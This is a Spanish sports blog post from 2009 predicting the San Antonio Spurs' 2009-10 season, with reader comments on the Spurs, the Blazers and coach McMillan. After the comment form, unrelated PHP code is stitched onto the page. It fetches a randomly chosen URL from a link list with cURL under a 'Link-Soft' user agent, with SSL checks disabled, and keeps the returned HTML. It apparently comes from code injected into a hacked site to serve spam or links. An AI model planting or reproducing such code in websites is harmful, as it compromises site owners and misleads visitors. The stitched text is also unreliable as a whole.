San Antonio Spurs: De nuevo candidatos

13 de October de 2009 por Jose_Dantley

Me vais a permitir comenzar este análisis en clave personal. Hace años estuve en San Antonio y cualquiera que haya estado por allí sabrá que las atracciones de la ciudad son más bien pocas: un par de parques de atracciones que no están entre los más renombrados del país, un supuestamente gran lugar histórico como El Álamo cuya fama está muy por encima de la realidad y un paseo fluvial, the Riverside, que quizá a alguno le suene de esas eternas conversaciones nocturnas entre Montes y Daimiel, pero cuyo río haría que el Manzanares a su lado pareciera el Amazonas. Todo eso… y los Spurs. Llama la atención como una ciudad cuyo mercado no figura entre los 30 mayores de Estados Unidos, ha colocado a su franquicia en 19 de los últimos 20 playoffs de la NBA, 12 de ellos consecutivos de la mano de Popovich y con 4 títulos. La respuesta probablemente está en hacer las cosas bien.

En el verano de 2009, nuevamente los Spurs han hecho las cosas bien. El equipo daba síntomas de estar en decadencia. Su máxima figura, Tim Duncan, para muchos el mejor 4 de la historia, ha cumplido 33 años, mientras que una de sus mayores bazas ofensivas, el eterno sexto hombre Manu Ginobili -32 años- se perdió por lesión media temporada provocando que Tony Parker se viera demasiado sólo como escudero de Duncan. A todo ello le sumamos que la temporada pasada tuvieron que asumir responsabilidades jugadores muy de relleno en la NBA como Roger Mason, Matt Bonner, Fabricio Oberto, o los veteranísimos Kurt Thomas y Michael Finley junto con el prometedor rookie George Hill.

En estas circunstancias podría pensarse que la ventana de títulos de los Spurs estaba cerrada pero su GM, Buford, se ha encargado de echar por tierra dicha teoría. El primer año sin Bruce Bowen, San Antonio ha decidido añadir un arma ofensiva más que libere de parte de esa tarea al trío Duncan, Parker, Ginobili.

Richard Jefferson llegó en un traspaso con un Milwaukee deseoso de liberar salario. Jefferson, que vivió sus mejores años con Jason Kidd, podría reeditar éxitos con Tony Parker, probablemente el mejor base penetrador de la NBA, y con un Tim Duncan que ha echado de menos tener más compañeros que le pudieran abrir el campo. Jefferson se acerca al 40% en triples, lo cual ampliará el abanico de opciones exteriores que estaba en manos de Ginobili y Mason. Para un entrenador de mentalidad defensiva como Popovich será un reto este nuevo escenario.

Por dentro, las bajas de Oberto y Thomas han sido cubiertas con dos grandes adquisiciones, Antonio McDyess y DeJuan Blair.  McDyess es un sensacional ejemplo de adaptación de una estrella – a finales de los 90 promediaba 20/10- a un rol de equipo más acorde con un físico mermado por las lesiones y la edad. DeJuan Blair fue una sorprendente segunda ronda, probablemente por el miedo de otros equipos a fichar un jugador con problemas de rodilla. Su aportación en el rebote puede ser clave.

Finalmente, además de otros jugadores secundarios como el energético rookie Jerrells, la eterna promesa Mahinmi o el veterano Bonner, han completado su rotación con un Marcus Haislip que vuelve a la NBA tras su etapa en Unicaja.

Los Spurs 2009-2010 son mejores que los de la temporada pasada en la que cayeron en playoffs en primera ronda. Cuidarán al máximo a Duncan y Ginobili para llegar al máximo nivel a playoffs y es más que probable que allá por los meses de mayo y junio sean el máximo obstáculo – quizá el único- para los Lakers en su lucha alcanzar las finales.

Quinteto titular: Tony Parker, Roger Mason, Richard Jefferson, Antonio McDyess, Tim Duncan
Sexto hombre: Manu Ginobili

Pronóstico: Finalistas de la conferencia Oeste

Comenta

28 comentarios a esta entrada

  1. Óscar dice:
    #1

    Espectacular lo de DeJuan Blair en pretemporada. Ya decíamos que era el mayor “robo” del draft y sólo puede ser 2ª ronda por esas dudas en cuanto a sus rodillas de las que habla Dantley. Una auténtica roca con 2 metros peladitos.
    En cuanto a dónde pueden llegar, por plantilla yo diría a Semfinales de Conferencia, pero hablamos de Popovich… Hay mucha igualdad detrás de los Lakers, como el año pasado (DEN, SAS, DAL, POR, UTA, HOU…) Ahí va a estar la cosa.
    La plantilla es comparable a la de 08/09. Con Jefferson tendrán el plus que necesitaban y McDyess y Ratliff les darán las dosis de experiencia y dureza necesarias, perdidas con la marcha de Bowen, Oberto o Kurt Thomas. Interesante ver a Haislip y Bogans. Y Mason debe demostrar que es el escolta titular por algo, dejó alguna sombra al final de temporada cuando parecía otro conejo de la chistera de Popovich.
    Y ojo al dato: se pasan 23 millones aprox. del tope salarial de esta temporada, sólo por detrás en el Oeste de LAL (91,2) y DAL (89,5), y empatado casi con UTA: 83,7 millones $ en salarios 09/10. Vaya tasa de lujo…
    Con elbig-3 sano, todo puede ser

      Citar

  2. Kiki dice:
    #2

    No podemos contar con los spurs…. si éste es año par xD !!!

      Citar

  3. Txusma dice:
    #3

    Pues mira, yo les doy como maximos favoritos a la victoria y es que, al contrario que en los otros candidatos, no hay un absoluto pero. El trio calavera (Duncan, Ginobily Parker) lleva años jugando juntos y ahora se les suma un Richard Jefferson que podria ser segunda espada en cualquier equipo q se precie. Rizando el rizo han incorporado a un super-clase como McDyess, a un trabajador nato como Bogans y a una super adquisicion del draft, DaJuan Blair. Y mantienen a Mason y Bonner en el equipo…
    Ni se intuyen problemas con las ultimas incorporaciones (Artest y Lakers?), ni se tiene la sensacion de que tras la estrella del equipo tan solo esta el vacio (Cavs?), ni parece q hayan problemas de lesiones (Garnet y los Celtics?)…
    En definitiva es el año de los Spurs, tal vez la ultima oportunidad.

      Citar

  4. CAMPO2 dice:
    #4

    Hola a todos yo creo que es un equipo que no llegara a final de conferencia los veo viejos y creo que si se cruzan en play-offs con dallas o denver palman seguro que son equipos con mas hambre de titulos y como apuntaba kiki es año par.

      Citar

  5. CAMPO2 dice:
    #5

    No viene a cunto pero he visto a Baron Davis con su nuevo look a lo rey leon y parece bastante mas delgado, ojala este año nos haga vibrar como con el WE BELIEVE

      Citar

  6. sergio dice:
    #6

    viejos? como los Celtics y los veo favoritos a todo…

    Para mi los Spurs son los maximos favoritos junto a los Lakers a ganar la conferencia este. Tambien podria darse una sorpresa tipo Dallas (graaaan plantilla), Portland (si echan a McMillan) o incluso Denver (sorpreson). Estos Spurs son quizas el equipo mas compensado de la liga… el unico con dos MVP’s de las finales si no me equivoco. Cuentan con el factor Ginobili y encima le añades a un Jefferson que es de los pocos aleros que te hace un 20-10 tirando dignamente…. Tienen rotacion interior y exterior (como Blair no se lesione algunos GM se tiraran de los pelos) y encima cuentan con el unico entrenador que puede contestarle a Jackson el titulo de mejor de la liga. Saben a lo que juega y dependen menos que otros de la inspiracion ofensiva para conseguir una victoria. Y ademas…. me encantan los Spurs!

      Citar

  7. sergio dice:
    #7

    conferencia oeste… ¬¬

      Citar

  8. Dantley2 dice:
    #8

    No los veo viejos. Duncan no ha perdido sus cualidades, simplemente que ahora no las puede poner en práctica 100 partidos al año, se dosificará. El caso Ginobili es el más preocupante, a ver qué tal ha salido de la lesión. Duncan es ambicioso a su estilo, sin levantar la voz, Manu es argentino y Parker fue MVP y repetirlo sería ya ponerlo al nivel del top-50 ese que hicimos. Blair tiene unas ganas de triunfar como diría que ningún otro en este draft. Y Popovich aburre, pero oye, gana partidos

      Citar

  9. CAMPO2 dice:
    #9

    Esto es como siempre, cuando ganen partidos apretados se dira que la experiencia es un grado y cuando palmen diran que jugaron como viejos, el termometro del equipo lo marcara el estado de ginobili

      Citar

  10. kantonyo dice:
    #10

    Si lo de DeJuan Blair funciona, yo me pido matar al GM de Portland, lo he venido pidiendo para los Blazers desde hace un año, y no entiendo como pudieron elegir a Cunningham, Pendergraph en vez de al exjugador de Pitts. Con la poca sangre que hay en el juego interior de los Blazers, su aportación hubiera dado un salto de calidad a la plantilla.

      Citar

  11. Kantonyo dice:
    #11

    Al igual que hice con la Conferencia Este, hago mis pronosticos sobre la Oeste:

    Favoritos al titulo West: Lakers – Spurs – Nuggets
    Playoffs Seguro : Blazers – Mavs – Jazz
    Lucharan hasta el final por PO: Hornets – Clippers – Suns
    Lo tendran díficil : Rockets – Warriors – OKC
    No tienen nada que hacer: Grizzlies – Kings – Wolves

      Citar

  12. sergio dice:
    #12

    Nuggets antes que Mavs?? jum… supongo que tienen ventajas de equipo hecho… pero el quintento de Mavs es muy interesante (ya, lo se, como todos los años xD)

    Y entraran antes en playoffs Rockets o OKC que Hornets quizas… Vamos pienso yo

      Citar

  13. Óscar dice:
    #13

    Pero Kantonyo, no me digas que eres de los Blazers también? Lo de Blair sorprende… pero dejemos pasar unos meses a ver cómo aguantan sus rodillas… Yo lo daba entre los 15 primeros seguro, y que haya caído a segunda ronda me dio que pensar tras verlo jugar con Pittsburgh bastantes partidos. Es carne NBA.
    Pero ojo a Cunningham, es una bestia, un atleta… lo que dudo es que encuentre minutos de “4” con Aldridge, Outlaw (que parece que jugará menos de “3”), Juwan Howard o incluso Udoka… Y de tres no lo veo mucho, aunque no tiene mal tiro hasta 4 metros y puede penetrar bien. Físicamente está preparado de sobra para la NBA. Pendergraph se perderá media temporadapor lesión, no creo que lo veamos mucho pero tiene buena pinta también. Sí es verdad como dijimos hace meses que hace falta ese punto más de agresividad en la zona… a ver cómo lo resolvemos con estos nuevos. LaMarcus debe ser all-star este año sí o sí.
    @ Sergio: como que si echan a McMillan? Pues no le quedan añitos, ya verás… La suerte para mí es que me gusta mucho como entrenador de ESTE equipo y para estos jugadores (debo ser el único en España). No me toques a mi Nate !!!! jeje

      Citar

  14. kantonyo dice:
    #14

    Sí Oscar, soy de Portland desde la época de Fernando, Petrovic y Sabonis, el desembarco de jugadores europeos cuando era pequeño, siempre me ha hecho sentir simpatia por esta franquicia. Luego después mi segundo equipo son los Wolves, gracias a Garnett en su momento.

    Además estoy contigo sobre la labor de McMillan, creo que tiene un gran merito la campaña que hicieron el año pasado, aunque es un entrenador muy metódico que utiliza un juego nulo de creatividad, creo que con esta plantilla tan joven puede que sea lo acertado.

      Citar

  15. sergio dice:
    #15

    Pues a mi me gustaban con el raton Stoudamire, Sheed de jovencito, Pippen,….

      Citar

  16. Jabho dice:
    #16

    Yo a los SPurs les veocomo candidatos al anillo junto con Lakers y Celtics. No veo ningún otro.

    En un Oeste cada vez menos salvaje creo que sólo Dallas si encontraran una química adecuada o Blazers si Oden progresa mucho, pueden apearlos de la final de conferencia.

    Con todos sanos (Manu, Parker, Jefferson y por supuesto Duncan) casi de igual a igual a los Lakers.

    Yo también creo que Mcmillan no es tan malo como lo pintan. Al menos no por lo de Sergio…

      Citar

  17. kantonyo dice:
    #17

    Por cierto yo veo un nivel superior a Denver comparado con Dallas, ya se demostró el año pasado, y las cosas tan poco han cambiado tanto como para pensar lo contrario. Además creo que este va a ser el año de CArmelo Anthony.

      Citar

  18. sergio dice:
    #18

    @ a Kantonyo: si fichar a Gooden y Marion no es un cambio a mejor en cuanto a plantilla dime tu… aunque supongo que te refieres a temas de quimica de equipo… y ahi tienes toda la razon, pero esta por ver.

    Estamos presuponiendo unas Finales del Oeste Lakers-Spurs, pero imaginaros ahora que los Spurs y Lakers terminan 2º y 3º en su conferencia… o 1º y 4º… Desde luego yo creo que de ahi saldra el campeon de este año siempre que respeten lesiones y todo eso.

    En cuanto a McMillan… pues si lo defendeis por tener un caracter controlador y autoritario, creo que hay bastantes entrenadores de ese perfil en la liga. Si es lo mas conveniente para un equipo joven lo pongo en duda pues creo que los jugadores jovenes prefieren confianza por parte de sus entrenadores (inclusive en declaraciones a la prensa y TV). Y ya si hablamos de tacticas en la pista, con el clasico “balones a Roy” (curioso que fuera el ROY), teniendo en cuenta que tienes a jugadores como Aldridge, Outlaw, Rudy,… ; gente capaz de irse a 15 puntos por partido sin problema pues creo que es un entrenador mediocre, la verdad. Que conste que considero a Roy de los mejores jugadores y uno de los grandes Mr. Clutch de la liga pero no creo que le venga bien que pierdan una ronda de Playoffs absorviendo tanta responsabilidad

      Citar

  19. Óscar dice:
    #19

    Sergio, yo no creo que McMillan se caracterice sólo por ser autoritario o controlador, eso es lo que se vende aquí. Es un entrenador serio, metódico y con bastantes más variantes de lo que se dice. En ocasiones puede ser bastante conservador, pero tiene las ideas muy claras. Es simplemente mi opinión, pero el año pasado ví más de la mitad de los partidos de Portland y creo que se le prejuzga demasiado fácilmente.
    Lo del “Roy-sistema” me hace gracia. Ya sabemos cómo es la NBA con los jugadores-franquicia de los equipos punteros: Kobe, LeBron, Nowitzki, Joe Johnson,… Brandon Roy no hace más tiros que otros con su status en la Liga, al contrario. Y aporta mucho más al juego colectivo que otros “all-stars”, y es superior a muchos en lectura de juego, selección de tiro, marcar el ritmo adecuado, etc . Byron Scott lo ponía ya la temporada pasada al mismo nivel de los cinco mejores de la NBA. Y Aldridge no debe ser el 2ª espada de un equipo que haga menos tiros precisamente… Y el asistente, el gran “Mo” Lucas siempre dice que debería tirar más veces y penetrar aún más.
    Y en cuanto a que McMillan no da confianza a los jóvenes, sólo un dato: la temporada pasada 4 rookies enraban en la rotación habitualmente y dos de ellos como titulares: Batum (19), Oden (20), Bayless (20) y Rudy Fernández…. Yo creo que eso es confianza, no? Si se te ocurre otro equipo de los 30 que hiciese algo parecido, a mí se me escapa.
    Por cierto, qué bueno lo del PHX-GSW al aire libre en California…. vaya efectos raros pillaba el balón… y Amundson, un fiera. Cómo ha progresado el tío. Y Frye ya con su manita tonta a paseo… estuvo bien.

      Citar

  20. Txusma dice:
    #20

    Pero bueno! De que vais a hablar en el analisis de Portland?? (q os chivo q llega mañana…)

      Citar

  21. Viva_Dirk dice:
    #21

    Seguiremos mañana en el análisis de Portland, pero yo no creo que el problema sea que Roy tire mucho, ya que lo hace con bastante acierto, sino que absorbe demasiado balón, McMillan de momento no ha sabido manejarse con un base puro, y este año tiene al mas puro de toda la NBA.

      Citar

  22. Óscar dice:
    #22

    !!! Albricias, el análisis de Portland !!! Estoy ansioso… si podéis, sacarlo por la mañana que no curro… la ocasión lo merece jejeje … Y siempre habrá que hablar, somos muy freakis los blazermaniacos…
    Y darnos caña, así hay carnaza para el debate juju

      Citar

  23. Óscar dice:
    #23

    Pues ayer los Blazers (2-2) palmaron en el mítico Memorial Coliseum, Attendance:11,740, del total también mítico de 12.666 espectadores que acogía de tope esta cancha que fue la casa de Portland hasta 1995.
    Un poco al estilo Spectrum del año pasado en Philadelphia, aunque ese partido fue de temporada regular y este de pretemporada… Donde esté el Rose Garden que se quiten los demás…

      Citar

  24. sergio dice:
    #24

    Pero es que confiar en los jovenes cuando tienes 4 jugadores de mas de 3 años… no es ser muy generoso ni un visionario… es usar lo que tienes. A mi me parece bien jugar el 90% del tiempo pensando en tu jugador estrella… lo que no es normal es la poca calidad como entrenador para seleccionar y crear jugadas decisivas, animar a tus jugadores cuando carecen de confianza, alternar sistemas ofensivos y defensivos,…. por esos detalles no lo considero un gran entrenador. Es pensar en Popovich o Jackson (tiros de Horry, Fisher, Fox, Ginobili,… y no eran la figura del equipo vaya…)y me da cierta lastima McMillan. (Ya, estos dos son palabras mayores)

    Que conste que me encantan los Blazers como plantilla, y este año mas, pero creo que mejorarian con otro entrenador.

      Citar

  25. kantonyo dice:
    #25

    Iba a decir algo de Portland, pero me lo guardo…….. que veo que estamos llenando el articulo de los Spurs, de todo menos de hablar de ellos… jajajaja

      Citar

  26. Dantley2 dice:
    #26

    Pues yo creo que el partido San Antonio-Portland estará bien, jeje

      Citar

  27. kantonyo dice:
    #27

    O las estadisticas de nba.co estan mal o ayer DeJuan Blair hizo 17 puntos y 10 rebotes en sólo 15 minutos!!!, un promedio que en 35 minutos serían 40 puntos, 24 rebotes… Vaya bestia!!

    Veremos si Popovich se atrave a darle la titularidad, y podriamos ver un Parker, Mason, Jefferson, Duncan y Blair en el quinteto titular.

      Citar

  28. roku mons dice:
    #28

    Direis lo que sea pero los demás equipos tampoco les veo capaces de ganar el anillo.Los Spurs junto a los LAKERS Y boston,son los uncios que tienen almenos tres muy buenos y uno bueno,duncan-parker-ginobili-jefferson,kobe,odom,gasol,fisher,y garnet,paul pierce….el resto que tienen,iverson en menphis tal vez con marc,porland,no veo ha nadie,toronto peor,mavericks al aleman now,hornet orlando,a pail cris y howar,ya me direis si esos con una estrella sólo pueden con los tres mencionados ariba que tienen mas de una,sino mirar quien ganan el anilloultimamente desde los bulls de jordan o san antonio,o lakers,boston y piston son un tropiezo de loa spurs y de los de los angeles,simplemente por una razon.DUNCAN Y KOBE aun alargan la sombra de los verdaderos reyes de la NBA jordan and company.hasta que no se retiren estos,san antonio y los angeles siempre seran RESPETADOS

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>